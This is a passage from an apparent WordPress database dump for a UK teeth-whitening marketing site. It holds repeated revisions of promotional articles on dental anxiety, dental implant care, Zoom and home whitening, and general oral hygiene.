mind</em> and <strong>go to the dentist without any fear or anxiety.</strong>','Is there a way to help get over Dental Anxiety?','','inherit','closed','closed','','142-revision-v1','','','2018-09-24 12:52:32','2018-09-24 12:52:32','',142,'https://teethwhiteningproduct.co.uk/2018/09/24/142-revision-v1/',0,'revision','',0),(144,1,'2018-09-24 12:53:34','2018-09-24 12:53:34','<h2>How can someone overcome Dental Anxiety?</h2>\r\nIn the UK, <em>it’s extremely common</em> for adults to have some f<strong>orm of dental anxiety.</strong> In fact, one in every three people has moderate dental anxiety. Dental anxiety can cause people to<em> refuse to visit the dentist</em> or <strong>ask for help regarding their own oral health.</strong>\r\n<blockquote><a href=\"https://www.nhs.uk/live-well/healthy-body/fear-of-the-dentist-help/\" target=\"_blank\" rel=\"noopener\">“One in four people in the UK dread to visit the dentist, however avoiding the dentist can lead to further complications.”</a></blockquote>\r\nIt’s becoming<em> increasingly common</em> for young adults in their 20s or 30s <strong>to avoid going to the dentist because of fears or phobias.</strong> The <strong>risk</strong> of cavities or gum disease is <strong>greatly reduced if people visit their dentist at least once a year.</strong> However, <em>fear is preventing</em> people from visiting their dentist.\r\n<h2>What can you do to reduce yours or someone else’s Dental Anxiety?</h2>\r\nThere are <em>numerous ways</em> to help <strong>relax and maintain your composure when visiting the dentist.</strong> This can be done in various solutions include; taking a friend with you, listening to your own music and having an early appointment to have less time during the day to think about it.\r\n<blockquote>“Constant communication with your dentist is critical. Make sure they’re fully aware of your own comfort and well-being, ensuring that the dentist does all they can to make sure you are relaxed.”</blockquote>\r\nMost importantly, you should <strong>make your dentist aware of your anxiety about dentistry.</strong> Dentists provide a <a href=\"https://www.shinedentalcare.co.uk/general-dentistry/nervous-patients-nottinghamshire/\" target=\"_blank\" rel=\"noopener\"><em>wealth of support and solutions</em></a> to ensure <strong>you aren’t panicking or worrying about your dentist check-up.</strong>\r\n\r\n<strong>Overcoming our dental anxiety isn’t impossible.</strong> If you’re still concerned about visiting the dentist, <a href=\"https://www.dentalfearcentral.org/\" target=\"_blank\" rel=\"noopener\">read more</a> about how you can <em>clear your mind</em> and <strong>go to the dentist without any fear or anxiety.</strong>','Is there a way to help get over Dental Anxiety?','','inherit','closed','closed','','142-revision-v1','','','2018-09-24 12:53:34','2018-09-24 12:53:34','',142,'https://teethwhiteningproduct.co.uk/2018/09/24/142-revision-v1/',0,'revision','',0),(145,1,'2018-09-24 12:55:35','2018-09-24 12:55:35','','dentist-2530990_960_720','','inherit','closed','closed','','dentist-2530990_960_720','','','2018-09-24 12:55:35','2018-09-24 12:55:35','',142,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/dentist-2530990_960_720.jpg',0,'attachment','image/jpeg',0),(146,1,'2018-09-24 12:55:36','2018-09-24 12:55:36','','doctor-1149149_960_720','','inherit','closed','closed','','doctor-1149149_960_720','','','2018-09-24 12:55:36','2018-09-24 12:55:36','',142,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/doctor-1149149_960_720.jpg',0,'attachment','image/jpeg',0),(147,1,'2018-09-24 12:55:37','2018-09-24 12:55:37','','woman-3498849_960_720','','inherit','closed','closed','','woman-3498849_960_720','','','2018-09-24 12:55:37','2018-09-24 12:55:37','',142,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/woman-3498849_960_720.jpg',0,'attachment','image/jpeg',0),(148,1,'2018-09-24 12:55:46','2018-09-24 12:55:46','<h2>How can someone overcome Dental Anxiety?</h2>\r\n \r\n\r\nIn the UK, <em>it’s extremely common</em> for adults to have some f<strong>orm of dental anxiety.</strong> In fact, one in every three people has moderate dental anxiety. Dental anxiety can cause people to<em> refuse to visit the dentist</em> or <strong>ask for help regarding their own oral health.</strong>\r\n<blockquote><a href=\"https://www.nhs.uk/live-well/healthy-body/fear-of-the-dentist-help/\" target=\"_blank\" rel=\"noopener\">“One in four people in the UK dread to visit the dentist, however avoiding the dentist can lead to further complications.”</a></blockquote>\r\nIt’s becoming<em> increasingly common</em> for young adults in their 20s or 30s <strong>to avoid going to the dentist because of fears or phobias.</strong> The <strong>risk</strong> of cavities or gum disease is <strong>greatly reduced if people visit their dentist at least once a year.</strong> However, <em>fear is preventing</em> people from visiting their dentist.\r\n<h2>What can you do to reduce yours or someone else’s Dental Anxiety?</h2>\r\n \r\n\r\nThere are <em>numerous ways</em> to help <strong>relax and maintain your composure when visiting the dentist.</strong> This can be done in various solutions include; taking a friend with you, listening to your own music and having an early appointment to have less time during the day to think about it.\r\n<blockquote>“Constant communication with your dentist is critical. Make sure they’re fully aware of your own comfort and well-being, ensuring that the dentist does all they can to make sure you are relaxed.”</blockquote>\r\nMost importantly, you should <strong>make your dentist aware of your anxiety about dentistry.</strong> Dentists provide a <a href=\"https://www.shinedentalcare.co.uk/general-dentistry/nervous-patients-nottinghamshire/\" target=\"_blank\" rel=\"noopener\"><em>wealth of support and solutions</em></a> to ensure <strong>you aren’t panicking or worrying about your dentist check-up.</strong>\r\n\r\n<strong>Overcoming our dental anxiety isn’t impossible.</strong> If you’re still concerned about visiting the dentist, <a href=\"https://www.dentalfearcentral.org/\" target=\"_blank\" rel=\"noopener\">read more</a> about how you can <em>clear your mind</em> and <strong>go to the dentist without any fear or anxiety.</strong>','Is there a way to help get over Dental Anxiety?','','inherit','closed','closed','','142-revision-v1','','','2018-09-24 12:55:46','2018-09-24 12:55:46','',142,'https://teethwhiteningproduct.co.uk/2018/09/24/142-revision-v1/',0,'revision','',0),(149,1,'2018-09-24 12:56:03','2018-09-24 12:56:03','<h2>How can someone overcome Dental Anxiety?</h2>\r\nIn the UK, <em>it’s extremely common</em> for adults to have some f<strong>orm of dental anxiety.</strong> In fact, one in every three people has moderate dental anxiety. Dental anxiety can cause people to<em> refuse to visit the dentist</em> or <strong>ask for help regarding their own oral health.</strong>\r\n<blockquote><a href=\"https://www.nhs.uk/live-well/healthy-body/fear-of-the-dentist-help/\" target=\"_blank\" rel=\"noopener\">“One in four people in the UK dread to visit the dentist, however avoiding the dentist can lead to further complications.”</a></blockquote>\r\nIt’s becoming<em> increasingly common</em> for young adults in their 20s or 30s <strong>to avoid going to the dentist because of fears or phobias.</strong> The <strong>risk</strong> of cavities or gum disease is <strong>greatly reduced if people visit their dentist at least once a year.</strong> However, <em>fear is preventing</em> people from visiting their dentist.\r\n<h2>What can you do to reduce yours or someone else’s Dental Anxiety?</h2>\r\n<img class=\"alignnone size-full wp-image-145\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/dentist-2530990_960_720.jpg\" alt=\"\" width=\"960\" height=\"637\" />\r\n\r\nThere are <em>numerous ways</em> to help <strong>relax and maintain your composure when visiting the dentist.</strong> This can be done in various solutions include; taking a friend with you, listening to your own music and having an early appointment to have less time during the day to think about it.\r\n<blockquote>“Constant communication with your dentist is critical. Make sure they’re fully aware of your own comfort and well-being, ensuring that the dentist does all they can to make sure you are relaxed.”</blockquote>\r\nMost importantly, you should <strong>make your dentist aware of your anxiety about dentistry.</strong> Dentists provide a <a href=\"https://www.shinedentalcare.co.uk/general-dentistry/nervous-patients-nottinghamshire/\" target=\"_blank\" rel=\"noopener\"><em>wealth of support and solutions</em></a> to ensure <strong>you aren’t panicking or worrying about your dentist check-up.</strong>\r\n\r\n<strong>Overcoming our dental anxiety isn’t impossible.</strong> If you’re still concerned about visiting the dentist, <a href=\"https://www.dentalfearcentral.org/\" target=\"_blank\" rel=\"noopener\">read more</a> about how you can <em>clear your mind</em> and <strong>go to the dentist without any fear or anxiety.</strong>','Is there a way to help get over Dental Anxiety?','','inherit','closed','closed','','142-revision-v1','','','2018-09-24 12:56:03','2018-09-24 12:56:03','',142,'https://teethwhiteningproduct.co.uk/2018/09/24/142-revision-v1/',0,'revision','',0),(150,1,'2018-09-26 11:51:04','0000-00-00 00:00:00','','Can You Make Dental Implants Last Forever?','','draft','closed','closed','','','','','2018-09-26 11:51:04','2018-09-26 11:51:04','',0,'https://teethwhiteningproduct.co.uk/?page_id=150',0,'page','',0),(151,1,'2018-09-26 11:56:14','2018-09-26 11:56:14','<h2>A Dental Implant can potentially be a Lifetime Solution</h2>\r\n<img class=\"alignnone size-full wp-image-154\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/girl-1162512_960_720.jpg\" alt=\"\" width=\"960\" height=\"600\" />\r\n\r\nJust like your natural teeth, dental implants <em>can’t last forever</em> <strong>nor should you think they should.</strong> A <strong>dental implant is a brilliant solution</strong> for <em>replacing</em> missing or crooked teeth. For starts, a dental implant can help:\r\n<ul>\r\n <li><strong>Benefits your oral hygiene.</strong> Missing teeth can leave your gums exposed to bacteria and plaque build-up which can cause further complications.</li>\r\n <li><strong>Improves your appearance.</strong> A missing gap can make you feel insecure about your smile. A dental implant will greatly improve your appearance and give you a confident smile.</li>\r\n <li><strong>Restores confidence in your appearance.</strong> 57% of British people are unhappy with their teeth. Dental implants can prevent anxiety or lack of confidence building from your missing teeth.</li>\r\n</ul>\r\n<a href=\"https://www.marlboroughdentalstudio.co.uk/treatment/dental-implants/\" target=\"_blank\" rel=\"noopener\">Experienced dentists offer brilliant dental implant treatments solely for you.</a> <strong>Dental implants are an investment in you.</strong> So how can you get the most out of them <em>for a long time?</em>\r\n\r\n \r\n<h2>Treat it like a Natural Tooth</h2>\r\n<strong>A misconception</strong> about a dental implant is that they <em>don’t need the same care or attention </em>compared to other teeth. <strong>You shouldn’t stop caring and looking after your teeth</strong> <em>after</em> you’ve had dental implants placed.\r\n<blockquote>\r\n<p style=\"text-align: center;\"><em>“If you’ve had dental implant treatment, don’t throw it all away by having bad oral hygiene. Implants require special attention to ensure they remain a part of your smile for the foreseeable future.”</em></p>\r\n</blockquote>\r\n<strong>We strongly recommend</strong> that you brush your teeth at least twice a day. <a href=\"https://www.pittsburghdentalimplants.com/dental-implants/maintenance/\" target=\"_blank\" rel=\"noopener\">Give your implant special attention</a> and <strong>ensure all sides are free of any plaque.</strong> Furthermore, <a href=\"https://www.dentalcare.com/en-us/patient-education/patient-materials/why-are-regular-dental-visits-important\" target=\"_blank\" rel=\"noopener\">continue to visit your dentist regularly</a> so that they can assess <em>how successful</em> the implant treatment was. <em> </em>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"https://teethwhiteningproduct.co.uk/2018/08/14/how-to-achieve-the-perfect-smile/\" target=\"_blank\" rel=\"noopener\">Looking for the Perfect Smile?</a> <strong>Read on to find out more.</strong>','Can You Make Dental Implants Last Forever?','','publish','closed','closed','','can-you-make-dental-implants-last-forever','','','2018-09-26 11:56:14','2018-09-26 11:56:14','',127,'https://teethwhiteningproduct.co.uk/?page_id=151',0,'page','',0),(152,1,'2018-09-26 11:53:49','2018-09-26 11:53:49','<h2>A Dental Implant can potentially be a Lifetime Solution</h2>\r\nJust like your natural teeth, dental implants <em>can’t last forever</em> <strong>nor should you think they should.</strong> A <strong>dental implant is a brilliant solution</strong> for <em>replacing</em> missing or crooked teeth. For starts, a dental implant can help:\r\n<ul>\r\n <li><strong>Benefits your oral hygiene.</strong> Missing teeth can leave your gums exposed to bacteria and plaque build-up which can cause further complications.</li>\r\n <li><strong>Improves your appearance.</strong> A missing gap can make you feel insecure about your smile. A dental implant will greatly improve your appearance and give you a confident smile.</li>\r\n <li><strong>Restores confidence in your appearance.</strong> 57% of British people are unhappy with their teeth. Dental implants can prevent anxiety or lack of confidence building from your missing teeth.</li>\r\n</ul>\r\n<a href=\"https://www.marlboroughdentalstudio.co.uk/treatment/dental-implants/\">Experienced dentists offer brilliant dental implant treatments solely for you.</a> <strong>Dental implants are an investment in you.</strong> So how can you get the most out of them <em>for a long time?</em>\r\n\r\n \r\n<h2>Treat it like a Natural Tooth</h2>\r\n<strong>A misconception</strong> about a dental implant is that they <em>don’t need the same care or attention </em>compared to other teeth. <strong>You shouldn’t stop caring and looking after your teeth</strong> <em>after</em> you’ve had dental implants placed.\r\n\r\n<em>“If you’ve had dental implant treatment, don’t throw it all away by having bad oral hygiene. Implants require special attention to ensure they remain a part of your smile for the foreseeable future.”</em>\r\n\r\n<strong>We strongly recommend</strong> that you brush your teeth at least twice a day. <a href=\"https://www.pittsburghdentalimplants.com/dental-implants/maintenance/\">Give your implant special attention</a> and <strong>ensure all sides are free of any plaque.</strong> Furthermore, <a href=\"https://www.dentalcare.com/en-us/patient-education/patient-materials/why-are-regular-dental-visits-important\">continue to visit your dentist regularly</a> so that they can assess <em>how successful</em> the implant treatment was. <em> </em>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"https://teethwhiteningproduct.co.uk/2018/08/14/how-to-achieve-the-perfect-smile/\">Looking for the Perfect Smile?</a> <strong>Read on to find out more.</strong>','Can You Make Dental Implants Last Forever?','','inherit','closed','closed','','151-revision-v1','','','2018-09-26 11:53:49','2018-09-26 11:53:49','',151,'https://teethwhiteningproduct.co.uk/2018/09/26/151-revision-v1/',0,'revision','',0),(153,1,'2018-09-26 11:54:05','2018-09-26 11:54:05','<h2>A Dental Implant can potentially be a Lifetime Solution</h2>\r\nJust like your natural teeth, dental implants <em>can’t last forever</em> <strong>nor should you think they should.</strong> A <strong>dental implant is a brilliant solution</strong> for <em>replacing</em> missing or crooked teeth. For starts, a dental implant can help:\r\n<ul>\r\n <li><strong>Benefits your oral hygiene.</strong> Missing teeth can leave your gums exposed to bacteria and plaque build-up which can cause further complications.</li>\r\n <li><strong>Improves your appearance.</strong> A missing gap can make you feel insecure about your smile. A dental implant will greatly improve your appearance and give you a confident smile.</li>\r\n <li><strong>Restores confidence in your appearance.</strong> 57% of British people are unhappy with their teeth. Dental implants can prevent anxiety or lack of confidence building from your missing teeth.</li>\r\n</ul>\r\n<a href=\"https://www.marlboroughdentalstudio.co.uk/treatment/dental-implants/\">Experienced dentists offer brilliant dental implant treatments solely for you.</a> <strong>Dental implants are an investment in you.</strong> So how can you get the most out of them <em>for a long time?</em>\r\n\r\n \r\n<h2>Treat it like a Natural Tooth</h2>\r\n<strong>A misconception</strong> about a dental implant is that they <em>don’t need the same care or attention </em>compared to other teeth. <strong>You shouldn’t stop caring and looking after your teeth</strong> <em>after</em> you’ve had dental implants placed.\r\n<blockquote>\r\n<p style=\"text-align: center;\"><em>“If you’ve had dental implant treatment, don’t throw it all away by having bad oral hygiene. Implants require special attention to ensure they remain a part of your smile for the foreseeable future.”</em></p>\r\n</blockquote>\r\n<strong>We strongly recommend</strong> that you brush your teeth at least twice a day. <a href=\"https://www.pittsburghdentalimplants.com/dental-implants/maintenance/\">Give your implant special attention</a> and <strong>ensure all sides are free of any plaque.</strong> Furthermore, <a href=\"https://www.dentalcare.com/en-us/patient-education/patient-materials/why-are-regular-dental-visits-important\">continue to visit your dentist regularly</a> so that they can assess <em>how successful</em> the implant treatment was. <em> </em>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"https://teethwhiteningproduct.co.uk/2018/08/14/how-to-achieve-the-perfect-smile/\">Looking for the Perfect Smile?</a> <strong>Read on to find out more.</strong>','Can You Make Dental Implants Last Forever?','','inherit','closed','closed','','151-revision-v1','','','2018-09-26 11:54:05','2018-09-26 11:54:05','',151,'https://teethwhiteningproduct.co.uk/2018/09/26/151-revision-v1/',0,'revision','',0),(154,1,'2018-09-26 11:54:29','2018-09-26 11:54:29','','girl-1162512_960_720','','inherit','closed','closed','','girl-1162512_960_720','','','2018-09-26 11:54:29','2018-09-26 11:54:29','',151,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/girl-1162512_960_720.jpg',0,'attachment','image/jpeg',0),(155,1,'2018-09-26 11:54:30','2018-09-26 11:54:30','','smile-122705_960_720','','inherit','closed','closed','','smile-122705_960_720','','','2018-09-26 11:54:30','2018-09-26 11:54:30','',151,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/smile-122705_960_720.jpg',0,'attachment','image/jpeg',0),(156,1,'2018-09-26 11:54:57','2018-09-26 11:54:57','<h2>A Dental Implant can potentially be a Lifetime Solution</h2>\r\n<img class=\"alignnone size-full wp-image-154\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/girl-1162512_960_720.jpg\" alt=\"\" width=\"960\" height=\"600\" />Just like your natural teeth, dental implants <em>can’t last forever</em> <strong>nor should you think they should.</strong> A <strong>dental implant is a brilliant solution</strong> for <em>replacing</em> missing or crooked teeth. For starts, a dental implant can help:\r\n<ul>\r\n <li><strong>Benefits your oral hygiene.</strong> Missing teeth can leave your gums exposed to bacteria and plaque build-up which can cause further complications.</li>\r\n <li><strong>Improves your appearance.</strong> A missing gap can make you feel insecure about your smile. A dental implant will greatly improve your appearance and give you a confident smile.</li>\r\n <li><strong>Restores confidence in your appearance.</strong> 57% of British people are unhappy with their teeth. Dental implants can prevent anxiety or lack of confidence building from your missing teeth.</li>\r\n</ul>\r\n<a href=\"https://www.marlboroughdentalstudio.co.uk/treatment/dental-implants/\">Experienced dentists offer brilliant dental implant treatments solely for you.</a> <strong>Dental implants are an investment in you.</strong> So how can you get the most out of them <em>for a long time?</em>\r\n\r\n \r\n<h2>Treat it like a Natural Tooth</h2>\r\n<strong>A misconception</strong> about a dental implant is that they <em>don’t need the same care or attention </em>compared to other teeth. <strong>You shouldn’t stop caring and looking after your teeth</strong> <em>after</em> you’ve had dental implants placed.\r\n<blockquote>\r\n<p style=\"text-align: center;\"><em>“If you’ve had dental implant treatment, don’t throw it all away by having bad oral hygiene. Implants require special attention to ensure they remain a part of your smile for the foreseeable future.”</em></p>\r\n</blockquote>\r\n<strong>We strongly recommend</strong> that you brush your teeth at least twice a day. <a href=\"https://www.pittsburghdentalimplants.com/dental-implants/maintenance/\">Give your implant special attention</a> and <strong>ensure all sides are free of any plaque.</strong> Furthermore, <a href=\"https://www.dentalcare.com/en-us/patient-education/patient-materials/why-are-regular-dental-visits-important\">continue to visit your dentist regularly</a> so that they can assess <em>how successful</em> the implant treatment was. <em> </em>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"https://teethwhiteningproduct.co.uk/2018/08/14/how-to-achieve-the-perfect-smile/\">Looking for the Perfect Smile?</a> <strong>Read on to find out more.</strong>','Can You Make Dental Implants Last Forever?','','inherit','closed','closed','','151-revision-v1','','','2018-09-26 11:54:57','2018-09-26 11:54:57','',151,'https://teethwhiteningproduct.co.uk/2018/09/26/151-revision-v1/',0,'revision','',0),(157,1,'2018-09-26 11:56:14','2018-09-26 11:56:14','<h2>A Dental Implant can potentially be a Lifetime Solution</h2>\r\n<img class=\"alignnone size-full wp-image-154\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/girl-1162512_960_720.jpg\" alt=\"\" width=\"960\" height=\"600\" />\r\n\r\nJust like your natural teeth, dental implants <em>can’t last forever</em> <strong>nor should you think they should.</strong> A <strong>dental implant is a brilliant solution</strong> for <em>replacing</em> missing or crooked teeth. For starts, a dental implant can help:\r\n<ul>\r\n <li><strong>Benefits your oral hygiene.</strong> Missing teeth can leave your gums exposed to bacteria and plaque build-up which can cause further complications.</li>\r\n <li><strong>Improves your appearance.</strong> A missing gap can make you feel insecure about your smile. A dental implant will greatly improve your appearance and give you a confident smile.</li>\r\n <li><strong>Restores confidence in your appearance.</strong> 57% of British people are unhappy with their teeth. Dental implants can prevent anxiety or lack of confidence building from your missing teeth.</li>\r\n</ul>\r\n<a href=\"https://www.marlboroughdentalstudio.co.uk/treatment/dental-implants/\" target=\"_blank\" rel=\"noopener\">Experienced dentists offer brilliant dental implant treatments solely for you.</a> <strong>Dental implants are an investment in you.</strong> So how can you get the most out of them <em>for a long time?</em>\r\n\r\n \r\n<h2>Treat it like a Natural Tooth</h2>\r\n<strong>A misconception</strong> about a dental implant is that they <em>don’t need the same care or attention </em>compared to other teeth. <strong>You shouldn’t stop caring and looking after your teeth</strong> <em>after</em> you’ve had dental implants placed.\r\n<blockquote>\r\n<p style=\"text-align: center;\"><em>“If you’ve had dental implant treatment, don’t throw it all away by having bad oral hygiene. Implants require special attention to ensure they remain a part of your smile for the foreseeable future.”</em></p>\r\n</blockquote>\r\n<strong>We strongly recommend</strong> that you brush your teeth at least twice a day. <a href=\"https://www.pittsburghdentalimplants.com/dental-implants/maintenance/\" target=\"_blank\" rel=\"noopener\">Give your implant special attention</a> and <strong>ensure all sides are free of any plaque.</strong> Furthermore, <a href=\"https://www.dentalcare.com/en-us/patient-education/patient-materials/why-are-regular-dental-visits-important\" target=\"_blank\" rel=\"noopener\">continue to visit your dentist regularly</a> so that they can assess <em>how successful</em> the implant treatment was. <em> </em>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"https://teethwhiteningproduct.co.uk/2018/08/14/how-to-achieve-the-perfect-smile/\" target=\"_blank\" rel=\"noopener\">Looking for the Perfect Smile?</a> <strong>Read on to find out more.</strong>','Can You Make Dental Implants Last Forever?','','inherit','closed','closed','','151-revision-v1','','','2018-09-26 11:56:14','2018-09-26 11:56:14','',151,'https://teethwhiteningproduct.co.uk/2018/09/26/151-revision-v1/',0,'revision','',0),(159,1,'2018-09-26 11:57:02','2018-09-26 11:57:02','','Dental Implants','','publish','closed','closed','','159','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',127,'https://teethwhiteningproduct.co.uk/2018/09/26/159/',5,'nav_menu_item','',0),(160,1,'2018-09-26 11:57:43','2018-09-26 11:57:43','<a href=\"https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile/can-you-make-dental-implants-last-forever/\" target=\"_blank\" rel=\"noopener\">There are various ways of achieving the perfect smile</a>, but more and more people are considering teeth whitening.\r\n\r\nCosmetic dentists are dedicated to helping their patients achieve the perfect smile. Your dentist will want people to be proud of their teeth and that they know how to effectively care for their teeth.\r\n<h2><a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Different Whitening Techniques:</a></h2>\r\n<h4>Zoom:</h4>\r\nYou won’t have to wait long to achieve your dream smile as this whitening treatment takes just over an hour. A dentist will use the tooth whitening technique called Zoom. This is a revolutionary dental service from America.\r\n\r\nWe will therefore apply the Zoom whitening gel to your teeth that will be activated by a specially designed light.\r\n\r\n<a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\"><img class=\"size-full wp-image-133 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/smilemoredental.jpg\" alt=\"Teeth Whitening at Smile More Dental\" width=\"165\" height=\"69\" /></a>You will be delighted with your bright smile as teeth can appear at least six shades whiter. <em>This procedure is simple, safe and effective.</em>\r\n\r\n<em>Visit Smile More Dental Care in North London for <a href=\"https://www.smilemoredentalcare.com/dental-health/teeth-whitening-in-a-beauty-spa\" target=\"_blank\" rel=\"noopener\">teeth whitening in a beauty spa</a>.</em>\r\n<h4>Home Whitening:</h4>\r\nOn top of providing a teeth whitening service at our practice, we will also supply slim teeth guards with the impression of your teeth.\r\n\r\nYou simply place the whitening gel into the guard and wear it over night or for 4 to 8 hours. We recommend wearing the guard whilst you sleep as it may be more comfortable and won’t interfere with your day to day tasks. However, you do have the option to wear the guard during the day, too.\r\n\r\nIn order for the home whitening system to work, it must be worn for 2 to 4 weeks on a daily basis. The results often vary from patient to patient, with many reporting they noticed a difference within three days whilst others can notice it more after a period of a few weeks.\r\n\r\n<a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\"><img class=\"wp-image-137 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/08/bbbeauty.png\" alt=\"Teeth whitening treatments\" width=\"118\" height=\"89\" /></a>Your choice of treatment will cease once you’ve achieved the whitest shade; however, we encourage the use of the whitening guards with the gel to be used every so often to maintain the white shade. <a href=\"http://www.bobelle.co.uk/improve-appearance-gain-confidence-tooth-whitening-treatments.html\" target=\"_blank\" rel=\"noopener\">See more information</a>.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a> for further information dental services and more. We look forward to speaking to you.\r\n\r\nRead more on <a href=\"https://teethwhiteningproduct.co.uk/dentists/\">cosmetic dental treatments</a> that are available.</blockquote>','How to Achieve the Perfect Smile','','inherit','closed','closed','','127-revision-v1','','','2018-09-26 11:57:43','2018-09-26 11:57:43','',127,'https://teethwhiteningproduct.co.uk/2018/09/26/127-revision-v1/',0,'revision','',0),(161,1,'2018-09-26 13:32:47','2018-09-26 13:32:47','','Discover The Zoom Difference.','','publish','closed','closed','','discover-the-zoom-difference','','','2018-09-26 13:32:47','2018-09-26 13:32:47','',0,'https://teethwhiteningproduct.co.uk/?page_id=161',0,'page','',0),(162,1,'2018-09-26 13:32:47','2018-09-26 13:32:47',' ','','','publish','closed','closed','','162','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/2018/09/26/162/',6,'nav_menu_item','',0),(163,1,'2018-09-26 13:32:47','2018-09-26 13:32:47','','Discover The Zoom Difference.','','inherit','closed','closed','','161-revision-v1','','','2018-09-26 13:32:47','2018-09-26 13:32:47','',161,'https://teethwhiteningproduct.co.uk/2018/09/26/161-revision-v1/',0,'revision','',0),(164,1,'2018-09-26 13:32:56','2018-09-26 13:32:56','','Award Winning Clinic','','publish','closed','closed','','award-winning-clinic%e2%80%8e','','','2018-09-26 13:33:04','2018-09-26 13:33:04','',0,'https://teethwhiteningproduct.co.uk/?page_id=164',0,'page','',0),(165,1,'2018-09-26 13:32:56','2018-09-26 13:32:56',' ','','','publish','closed','closed','','165','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/2018/09/26/165/',7,'nav_menu_item','',0),(166,1,'2018-09-26 13:32:56','2018-09-26 13:32:56','','Award Winning Clinic','','inherit','closed','closed','','164-revision-v1','','','2018-09-26 13:32:56','2018-09-26 13:32:56','',164,'https://teethwhiteningproduct.co.uk/2018/09/26/164-revision-v1/',0,'revision','',0),(167,1,'2018-09-26 13:33:09','2018-09-26 13:33:09','','Book A Teeth Whitening Session','','publish','closed','closed','','book-a-teeth-whitening-session%e2%80%8e','','','2018-09-26 13:33:09','2018-09-26 13:33:09','',0,'https://teethwhiteningproduct.co.uk/?page_id=167',0,'page','',0),(168,1,'2018-09-26 13:33:09','2018-09-26 13:33:09',' ','','','publish','closed','closed','','168','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/2018/09/26/168/',17,'nav_menu_item','',0),(169,1,'2018-09-26 13:33:09','2018-09-26 13:33:09','','Book A Teeth Whitening Session','','inherit','closed','closed','','167-revision-v1','','','2018-09-26 13:33:09','2018-09-26 13:33:09','',167,'https://teethwhiteningproduct.co.uk/2018/09/26/167-revision-v1/',0,'revision','',0),(171,1,'2018-11-06 10:52:06','2018-11-06 10:52:06','A healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\nA wide range of treatments are available which include.\r\n\r\n► Cosmetic dentistry\r\n► Teeth Whitening\r\n► Orthodontic\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontics\r\n► Endodontics','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 10:52:06','2018-11-06 10:52:06','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(172,1,'2018-11-06 11:46:28','2018-11-06 11:46:28','<img class=\"aligncenter wp-image-42 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg\" alt=\"\" width=\"960\" height=\"640\" />From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\r\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\r\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\r\n<ol>\r\n <li>\r\n<h2>Eat healthy food</h2>\r\n</li>\r\n</ol>\r\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\r\n\r\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\r\n\r\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\r\n<ol start=\"2\">\r\n <li>\r\n<h2>Brush and floss</h2>\r\n</li>\r\n</ol>\r\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\r\n\r\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\r\n\r\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\r\n<ol 